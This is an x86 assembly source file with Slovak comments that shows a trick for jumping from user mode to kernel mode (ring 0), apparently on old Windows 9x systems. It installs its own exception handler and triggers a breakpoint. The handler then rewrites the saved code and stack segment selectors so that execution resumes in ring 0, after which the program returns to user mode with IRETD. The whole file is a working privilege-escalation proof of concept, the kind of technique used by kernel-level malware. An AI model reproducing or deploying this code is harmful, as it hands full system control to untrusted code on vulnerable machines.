.386p
.MODEL FLAT,STDCALL
locals
jumps
UNICODE=0
include w32.inc

Extrn SetUnhandledExceptionFilter : PROC

.data

sprava1        db "Ukazka prepnutia do RING0 pomocou SEH (The Owl's method",0
sprava2        db "RING0 bol uspesne aktivovany",0


.code

Start:

                xor  eax,eax                    ;nuluje register eax, koli nastavovaniu novej obsluhy SEH

                push offset xhandler            ;adresa pre nasu novu obsluhu (xhandler) SEH

                push dword ptr fs:[eax]         ;ulozi adresu povodnej obsluhy SEH

                mov  dword ptr fs:[eax],esp     ;nastavi nasu novu obsluhu SEH

                pushfd                          ;ulozi EFLAGS

                mov  eax,esp                    ;ulozi register  ESP (adresu stacku)

                int  3h                         ;vyvolame chybu a tym volame nasu novu obsluhu (xhandler) SEH

;-----------------------------------------------------------------------------
;ODTIALTO UZ PROGRAM BEZI V RING0
;-----------------------------------------------------------------------------

                mov  ebx,dr7                    ;skuska, ci sme naozaj v RING0

                                                ;obnovi povodne hodnoty registrov pre RING3
                push edx                        ; GS
                push edx                        ; FS
                push edx                        ; ES
                push edx                        ; DS
                push edx                        ; SS
                push eax                        ; ESP
                push dword ptr [eax]            ; EFLAGS
                push ecx                        ; CS
                push offset ring3               ; EIP = adresa kam skoci spat do RING3

                iretd                           ;skok spat do RING3


;-----------------------------------------------------------------------------
;ODTIALTO UZ PROGRAM BEZI OPAT V RING3
;-----------------------------------------------------------------------------
ring3:

                popfd                           ;obnovi EFLAGS

                pop  dword ptr fs:[0]           ;nastavi povodnu obsluhu SEH
                add  esp,4                      ;vycisti stack


                call MessageBoxA,0, offset sprava2, offset sprava1,0



                call ExitProcess, -1            ;ukonci program



;-----------------------------------------------------------------------------
;NASA NOVA OBSLUHA SEH (xhandler)
;-----------------------------------------------------------------------------
xhandler:

                push ebp                        ;nastavi si stack
                mov  ebp,esp                    ;a zisti si jeho adresu
                push ebx
                push ecx

                mov  ebx,[ebp+8]                ;nacita adresu, kde je ulozene o aku chybu ide

                cmp  dword ptr [ebx],80000003h  ;testuje, ci bola chyba EXCEPTION_BREAKPOINT, ktoru sme vyvolali pomocou INT 3h
                jne  koniec                     ;ak nie, skoci

                mov  eax,[ebp+10h]              ;nacita adresu zaciatku Context

                movzx ecx,word ptr [eax+0bch]   ;nacita z Context Seg.Cs

                mov  [eax+0ach],ecx             ;ulozi do Context.ECX (tato hodnota bude po prepnuti do RING3 v ECX)

                mov  dword ptr [eax+0bch],28h   ;ulozi do Context Seg.CS (tato hodnota bude v registri CS). Tymto si zabezpecuje prepnutie do RING0.

                movzx ecx, word ptr [eax+0c8h]  ;nacita z Context Seg.SS

                mov  [eax+0a8h],ecx             ;ulozi do Context.EDX (tato hodnota bude po prepnuti do RING3 v EDX)

                mov  dword ptr [eax+0c8h],30h   ;ulozi do Context Seg.SS (tato hodnota bude v registri SS). Tymto si zabezpecuje prepnutie do RING0.

                or   dword ptr [eax+0c0h],0200h ;nastavi CLI do Context.EFLAGS (tato hodnota bude v registri EFLAGS)

                mov  eax,0                      ;nuluje EAX

koniec:

                pop  ecx                        ;vycisti stack
                pop  ebx
                mov  esp,ebp
                pop  ebp

                retn                            ;skok spat do programu, ale ten uz bude bezat dalej v RING0




ends
end Start
